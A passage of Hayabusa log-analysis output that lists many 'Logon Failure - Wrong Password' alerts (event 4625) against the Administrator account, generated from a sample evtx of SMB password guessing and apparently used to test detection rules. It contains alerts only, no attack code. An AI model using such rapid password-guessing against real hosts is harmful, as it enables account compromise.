NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: 